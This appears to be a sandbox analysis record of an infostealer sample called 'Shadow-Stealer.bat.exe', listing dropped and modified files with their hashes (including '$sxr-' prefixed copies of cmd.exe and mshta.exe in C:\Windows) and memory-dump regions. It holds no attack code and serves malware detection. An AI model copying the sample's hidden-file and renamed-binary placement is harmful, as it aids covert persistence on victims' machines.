SHA2564286cd3f23251d0a607e47eccb5e0f4af8542d38b32879d2db2ab7f4e6031945
SHA51261e263935d51028ec0aab51b938b880945a950cec9635a0dafddf795658ea0a2dfcf9cfc0cab5459b659bb7204347b047a5c6b924fabea44ce389b1cbb9867d6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5196eaa9f7a574c29bd419f9d8c2d9349
SHA119982d15d1e2688903b0a3e53a8517ab537b68ed
SHA256df1e96677bcfffe5044826aa14a11e85ef2ebb014ee9e890e723a14dc5f31412
SHA512e066d74da36a459c19db30e68b703ec9f92019f2d5f24fd476a5fd3653c0b453871e2c08cdc47f2b4d4c4be19ff99e6ef3956d93b2d7d0a69645577d44125ac7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016Filesize
118KB
MD58907aef87f7d901c97d6c3699fd8d1a6
SHA1a3429685ca3bb031738858e86f72a74698c147a7
SHA2569b4f6d5162b94e469fa6467a9a9a5186c8abf1e42358b9bf9dd0900744e57909
SHA51293d0df9549197304ead7baf299a308f7b1fded1cc3dc9b1354fb46f777504e71f9d0cb05aa38d151e7aa4feed0ee35a0e46acddab29607b80eb39ad27b4cae18
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
2KB
MD525a26b8c3416b8b9aa406bd4bbadfb5e
SHA1677fdf250c5fddef5aa8827e9d2f7debfe475210
SHA256dba247f47aa1164dc25aac7cc0a169b6a43f6e4fc02bf58ddef168dad445195d
SHA512246fafea4d7e603bfafb5654bef35e7c9308cd2ac22ef932db0ad56853d06ec4a56f76f45049f85057ecf55d433d21695c4b670dc66cf2b2048f6897cb30ea95
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
2KB
MD5a00aa49bb4262c5879ee124ba663df57
SHA102f8d07236b1cd07bb2dd5c901953bc4de92e515
SHA256bbf33658bf92ed5ef5016ea206b043a80c85d1a5e38c037e03241b8841edce3c
SHA512dbda6588290e474a716e1d5bb6e55da4b76c2d1b890e9cee99993aacbf8a357d8163bbb2f58762c0121addffafe9a8fb653ef4430a18429d6df430749ce0fc1e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
2KB
MD5ab1b300fa63bfbdda59a6813bbfba12a
SHA1b7c7293715563b202c6e668d648e20eeda0af56e
SHA256586d0230343f60f7cbf9afff6a86c1c572d0edcaef8e34de5f3bd0c1ec7a394f
SHA512c925ce7b1334a3de6a2653c90411ae452ccefda8598e86b18c5a0e8067534dbbae31e4d9e027cf64a0f9f670daa9d71e3fa8df1cb09e6792ccc1cad7ca661f3b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
595B
MD555c1f7bff501bd7f6baed810c9833671
SHA103df557ee6275d32f80932bd9639435ba31aa3c8
SHA25695d61c2bcb097ab5caca96f244252bc8eda212ca1bf839804ce8598a3eeae34b
SHA512ad3416ec54f4d763dcf033a30a8fa840e68dd449d52250073ab163c8e83e012a0afb386a195db8129e83512d6c81c58cf62bf6279ca7dbe350b1ba452d7eea0b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
678B
MD583f65a45c1824322e468923d39173c05
SHA1c30ba81c98d4f3b67d23791db398b3c82a6d0a24
SHA2561ee1f2fa5ef47193e6a59f4743aff91ab81fbca43292487ce85623f6d18b2ed0
SHA512c44da4b2ce7e639e8e3090adf47bf9451b8df3e08e83020a60f1cc0f5bd7a3bf2ffde4b0c700443e97280a59e9067cedd3f999e541844ffab3adbd9b887c91d4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD53bcc13187882f005db214ab25d0eab74
SHA1919c17017b8b47ea4bfbba0663fdeb44ec38c29f
SHA25633ed20bc29940106a6d31d04b30e259bdaa1b678de1e682d5187fabfb8114268
SHA51204179203414f30a18fbf0189ba2c56cf034358b023ba222c92456db187823a673f68edf786a4cf37f88c1f9a4622cb7668dfc704bb4eb7e25e21b02a8ee45abd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5fa3a7032933b32ca8b677d09b040c2b0
SHA16269bedacd552e160b98d3ed9721c2812afe7b25
SHA2565dd361d462b1868c18678e756399d74459a0ff6612de2bcdf8c4c4bdadf1c9b4
SHA512f6221a13d39d190ac6a7cdf170434f1ae90a346bf3da94f6974dce3a07f3f20e782d8cc98afd01c7365a46099426abe7654b8604bc51f3e96df0297325371abe
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5f457fbc37da6a68130e0cecbcd69b158
SHA12243d8d629ef73850ff5742e7b51082249aa3067
SHA2565e91369a05af44d86d6eee026665adbeca35ace3f7a4c05ed9e3d9c2a1ab0e14
SHA512f82d8a58f1edd850518abb9ff8bae1437a7f019b68433c266162eac18305a9627c9b0d201277234dfe99647417e89f785b214f66d1d9b59d9548b9f974991cf5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5ab0fa8c162b50d19c1e9ac97b33f967d
SHA116647ab0147882f8b8fec806127593031feb6c2f
SHA256fc49db963109394857b1c7c6dc60b1c54814cbfc63e4609a2a57df75f65ced77
SHA512d3e8aa27cd2625094d15b3e829cca61b870166c43b68f6866e3ae99318b029bbdedeaba7822b2597a1cd1b2002ca6542928e3456a075723fca05f4d276b89e8e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5f5560b8904dd237e0e0e2983446b3284
SHA1376ad60d6bc80d8dd2d94cf60fe40bb9f1372158
SHA25644c8953d7b9ddae995510c82660b0e40ad41c41af7ca56d2cfcbed31938b4efa
SHA5127c702ff10990aa5e6b3516ef3cd12fe26f6fac8370f70bda779da44596450e6c348e3d9b63af6d92a25cc3959baa9a9a0164de0833a9acbc6d2f88fcd2864730
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5fb737b6623c55f9db4ab17816fa30ea7
SHA1c8f8fb40d993011349207d36ca153e7644bce98c
SHA256ea0dd01e51c4d7a53ff9d302d62631627eda9aff08f5356a042c17a9e5236253
SHA512631fbd38c744e797f9fa4988a5034671a10cc1e29240c44a488914e76da0e16a6d689b0bc6ffaf169b22e5f946705e403092881c5b1088cdad724a25656d28fe
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD51d37976e2f77224b54c49e9602a54e61
SHA12853a336e0bc7d6c38b09f870b14277535cb86fb
SHA256ce6f42953a1c8119e2ee5c9bc8055121bf68434fbca9467d97c4ef3496f31f1a
SHA5128c6249f4afb63568808da22a9640f74e26a41f1ee6210f9cba856fab2db6f928c2ee2c5c9048ec711c7f79c3905f3eaa054f83ad17f294dec8b381cb48170979
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5425aeb08ff28ca5ded65df5c80c131b7
SHA1c8a40c146aab4574114a24a5e3a186edc87a125a
SHA256442a3bd6a90d5c1e49f1825d9cd334afb1170ad6ce91b85f50b87d040183f5de
SHA512aba711c5df799aa4b9b3425d68cddd254230d1be2a3317532c88bfb4dfc7d4bddce5515a7b1bdf53f41e88eda3fe35b30b9eed828270ef1ace850544e671278a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58c4e1.TMPFilesize
1KB
MD5a9e094bfe837ef97fdd6c2636c0f2209
SHA1b46e767c5c7ed1f01c28ebde78b9f17623358526
SHA256bcd90ccdb697dd1292a1a6375c31632334ceb1e32ac6e73b99277414d4bfe59a
SHA5122953bb6581d07f0e39a7c807cb4a68dc2060092f03369dffdeb76860d6e7991700ed2164072bd7e83f33d38ab3273d3df33fed67a7a0ce395b375a44aa009f78
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\ab2c1477-c56b-40e8-9ce6-6f51ba6306d2\1Filesize
7.5MB
MD56fe3f151cbe46134da5c593e99364851
SHA1d33d6727f1ea7eb5e2c74bcfa994f2743a1505fc
SHA2567851ea0840116de2ef9bcc682f1e67f81cdb713c13ef6797c22fbd17e5f7ea2d
SHA512d10017c8fa3140082cd8f174d2bb4597bac18a465c42ce7eb1b6ce6b79d153c5cbab632fe4bb15e28ebd288073ab504b317dc7a50553b5701782e19ac4338986
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD594acf78e23b061d2e4c4ac44dd9ebc64
SHA1e1f9ec9d6e710d84f7514d7dba61ac612fd322a9
SHA25699d45576ebc1c5e98843594418ae66ba65dfc9983ac3634509f9009dd99f9ec2
SHA51269e1d3a6aabcee1d661e5d97c2a7f6c5a5f6de616f69aada789c401be3a8b2ca9758551992595573222b319b17ba1d83753365ad6a68b1d584150a17cfc07ef2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD5196b1dbaff732636b069bf58de959efe
SHA1987a287689b564db833b218637745b47a887ea47
SHA25648413ff14f29af3b66678c40c46091c4ff71015f5ed3c91104d371fe12a304c8
SHA512fea45433b06e21561f0cda697538df4c8e85b1bd401c6f92cff967c42d15ac3f7c1c15f3cb84cc07c7b68dcc29ffb9b3189b5343ebd300dae55e0aa8be200150
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD5b29ef581c3d0e11e572a747353d724e1
SHA1d56f295929db4a5bd14936d103a487199f5c8629
SHA256f78f81ab9c22888adbc8fbfeec081a697d991de4cc1a20a958bfc831ef84740e
SHA5128649e18566c1d66dfde2612044070fcd099a146ef9c58c528378b0cf76151cbc4daf811a37c3c342bf4b757fb0e626b37e64271f99a7c28e9c82984ec3f06c23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD55b6a0098c5167cb301633198797f4232
SHA11a5c7859800d6e975dc86190e7026d8c327fa018
SHA256c84796f28de39bdaa9ccea6e02f5a515545c29eabf4fc9993a8b581fd2fbc70a
SHA512f9f619cf84b3d9f8315d4486787a3dd13a58fd6e7cf837f237564f9dee376f7255b88c80c5c84414e00e329c6a463d8283d3ffeda90c069184dd5eb2c8cee338
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
14KB
MD599bc31e04db1d9a24cf1dfa75732f3f0
SHA16c4dd942cb32bd693fe3e77a6e399d3938921ae8
SHA256fecd95c2baf6e6de1526bd23c537c1baf54c1a70f78da534057b60179a126d9c
SHA51205c1808f1d9763dcbae1d675ae5d59142bc3b784be2c3938cafc388c3a73fa923813cb4d8fa1969d205179dee2586bb87aed710523a66cb92076dff52d3bcb70
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD559d37a8c588c83e806678c7fb5d1229f
SHA14396d68567f30f08e08a269802fe3f4784b88c5b
SHA256c1af181e4703177ae1c55f2160c6b7685f3536da35a1501e4a70e25155519e84
SHA51219223db6932776bdfcd8202a8ca19e60deacacdc6e44f2f219b541b4e2eadb82c7c819512f17c76f9ca177ca89452adbebf30dceef9fcc05085472ff49ea8dc2
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.datFilesize
10KB
MD59a7af7f1f08f7de9da3ba647286ee5a6
SHA1d7a23961ba5f8c4242a03f20686ff516c2ae432c
SHA256dddc3d322b46ec53927c26326a4f4d573dec131fbe668450f984c91c3104a08b
SHA51264b0d94e68aa2d0ee9d02f170de6989f5255c5c57d05dffbf4dbbe012dae43a6f4dbd59c6a85fd2621fb84ae7f4cdf486a089b90e3e6c4fce1b152ba5aa6ba58
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.datFilesize
10KB
MD535745802ec2865acb4c60e651e5a8620
SHA1f10c746a71c2741790aa3f5160ea7d9be1a1920a
SHA256ef386e977e9fcfc811f2710d0d630e23e2278cf9811770da0c2f10f3965b7a63
SHA5120031f739cafa1089dc655a3509bc215fc900c20734507a1b0b69f1ad1567fb2fe4af725360cf952a4689e89973bbd59a53ea6ff8bd6c4c67b9e732f66f14a42f
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_12abi4ne.xje.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\$sxr-Logs\2024-06-30Filesize
320B
MD5eac6f5ecbbd53cde039298927fee7bf2
SHA15cf40b1cdb78967fb9a0fd810f12e603885ed0aa
SHA2566bc11fb099fb5db9fe6dce10c8030cd79e72c015a8aef5af223bc0e28a9b09fa
SHA51287d7e5292e815307e05b30cef6546f3235cb425f964ca60f0632dbe2738109d8b0269a49d91567f4a27981e8a1c952f778099819dd2ed1ffb50d241573695360
-
C:\Users\Admin\AppData\Roaming\$sxr-Logs\2024-06-30Filesize
400B
MD5bde548ba96f17ed3fe6405321d275d13
SHA194bd70f0ac8389e0fc44ba781cff12cc7655ddf5
SHA256d60e1b5a036b719b797e9f1b713d61ce1171d92473a6da3cb7686a957439ad9f
SHA5120b5aabfd2b267f0f7b5ea4b5cb0c1f9d1e4c594d97f951bd174dbc3bd268a1c578212b98dc88fa69c42508c01d92ef2353a172cb9e601ea640d711e8a529e3ea
-
C:\Users\Admin\Downloads\Shadow-Stealer.bat.exeFilesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d
-
C:\Users\Admin\Downloads\Shadow-Stealer.bat:Zone.IdentifierFilesize
26B
MD5fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98
-
C:\Users\Admin\Downloads\Unconfirmed 690217.crdownloadFilesize
12.5MB
MD5cf5b412ffc3ce43cd7ddce602fc67f56
SHA1221dfcd0868158f676c472d8a5bcf9647f0c7d51
SHA25684ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724
SHA512695489d3b02863c382dc4b044bd80825b3f46eadfe4647619a0036da7ab3405b7925e89a457b19ee57995a59dcf8d5f9df237cd4d5d59a6cee3914aeaee2a8ef
-
C:\Windows\$sxr-cmd.exeFilesize
324KB
MD5c5db7b712f280c3ae4f731ad7d5ea171
SHA1e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89
-
C:\Windows\$sxr-mshta.exeFilesize
32KB
MD5356e04e106f6987a19938df67dea0b76
SHA1f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA2564ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd
-
\??\pipe\LOCAL\crashpad_2044_LTYXBSGMNMGLCRBTMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/428-658-0x000001DD8A3F0000-0x000001DD8A417000-memory.dmpFilesize
156KB
-
memory/428-659-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/460-670-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/460-669-0x00000199BA000000-0x00000199BA027000-memory.dmpFilesize
156KB
-
memory/628-660-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/628-653-0x0000028CBBCF0000-0x0000028CBBD17000-memory.dmpFilesize
156KB
-
memory/628-652-0x0000028CBBCC0000-0x0000028CBBCE2000-memory.dmpFilesize
136KB
-
memory/636-683-0x0000028C682A0000-0x0000028C682C7000-memory.dmpFilesize
156KB
-
memory/636-684-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/692-663-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/692-656-0x000001EB11B90000-0x000001EB11BB7000-memory.dmpFilesize
156KB
-
memory/772-674-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/772-673-0x000001C17FB30000-0x000001C17FB57000-memory.dmpFilesize
156KB
-
memory/936-687-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/936-686-0x000001CBEEED0000-0x000001CBEEEF7000-memory.dmpFilesize
156KB
-
memory/984-665-0x00000270F6F60000-0x00000270F6F87000-memory.dmpFilesize
156KB
-
memory/984-666-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/996-583-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/996-582-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/1168-690-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/1168-689-0x0000023321E90000-0x0000023321EB7000-memory.dmpFilesize
156KB
-
memory/3408-581-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB
-
memory/3408-580-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB
-
memory/4700-648-0x00007FFB7E100000-0x00007FFB7E309000-memory.dmpFilesize
2.0MB
-
memory/4700-649-0x00007FFB7DB10000-0x00007FFB7DBCD000-memory.dmpFilesize
756KB
-
memory/4700-647-0x0000000140000000-0x0000000140028000-memory.dmpFilesize
160KB
-
memory/4700-646-0x0000000140000000-0x0000000140028000-memory.dmpFilesize
160KB
-
memory/4700-650-0x0000000140000000-0x0000000140028000-memory.dmpFilesize
160KB
-
memory/4820-571-0x0000020EB0B10000-0x0000020EB1560000-memory.dmpFilesize
10.3MB
-
memory/4820-579-0x0000020E981E0000-0x0000020E981EA000-memory.dmpFilesize
40KB
-
memory/4820-559-0x0000020EB0540000-0x0000020EB0562000-memory.dmpFilesize
136KB
-
memory/4820-568-0x0000020E981A0000-0x0000020E981C4000-memory.dmpFilesize
144KB
-
memory/4820-570-0x00007FFB7DB10000-0x00007FFB7DBCD000-memory.dmpFilesize
756KB
-
memory/4820-569-0x00007FFB7E100000-0x00007FFB7E309000-memory.dmpFilesize
2.0MB
-
memory/4820-573-0x0000020EB1560000-0x0000020EB1606000-memory.dmpFilesize
664KB
-
memory/4820-574-0x0000020EB1610000-0x0000020EB1666000-memory.dmpFilesize
344KB
-
memory/4820-575-0x0000020EB1670000-0x0000020EB16C8000-memory.dmpFilesize
352KB
-
memory/4820-576-0x0000020E981C0000-0x0000020E981E2000-memory.dmpFilesize
136KB
-
memory/4820-577-0x00007FFB7E100000-0x00007FFB7E309000-memory.dmpFilesize
2.0MB
-
memory/4976-631-0x000001B33B3D0000-0x000001B33B482000-memory.dmpFilesize
712KB
-
memory/4976-628-0x000001B33B2C0000-0x000001B33B310000-memory.dmpFilesize
320KB
-
memory/4976-620-0x000001B3431B0000-0x000001B3435EE000-memory.dmpFilesize
4.2MB
-
memory/4976-644-0x00007FFB7DB10000-0x00007FFB7DBCD000-memory.dmpFilesize
756KB
-
memory/4976-619-0x000001B3429E0000-0x000001B3431AA000-memory.dmpFilesize
7.8MB
-
memory/4976-618-0x000001B33A380000-0x000001B33A906000-memory.dmpFilesize
5.5MB
-
memory/4976-617-0x00007FFB7DB10000-0x00007FFB7DBCD000-memory.dmpFilesize
756KB
-
memory/4976-616-0x00007FFB7E100000-0x00007FFB7E309000-memory.dmpFilesize
2.0MB
-
memory/4976-622-0x00007FFB7E100000-0x00007FFB7E309000-memory.dmpFilesize
2.0MB
-
memory/4976-621-0x000001B3435F0000-0x000001B3436A2000-memory.dmpFilesize
712KB
-
memory/4976-643-0x00007FFB7E100000-0x00007FFB7E309000-memory.dmpFilesize
2.0MB
-
memory/4976-645-0x000001B33B350000-0x000001B33B386000-memory.dmpFilesize
216KB
-
memory/4976-632-0x000001B33B660000-0x000001B33B822000-memory.dmpFilesize
1.8MB
-
memory/4976-641-0x000001B33B310000-0x000001B33B34C000-memory.dmpFilesize
240KB
-
memory/4976-933-0x000001B33C0C0000-0x000001B33C5E8000-memory.dmpFilesize
5.2MB
-
memory/4976-642-0x000001B33AC60000-0x000001B33ACAE000-memory.dmpFilesize
312KB
-
memory/5684-2565-0x000002A072C90000-0x000002A072D42000-memory.dmpFilesize
712KB
-
memory/5832-1521-0x0000022FA7B00000-0x0000022FA7B24000-memory.dmpFilesize
144KB
-
memory/5832-1634-0x0000022FA7C40000-0x0000022FA7C62000-memory.dmpFilesize
136KB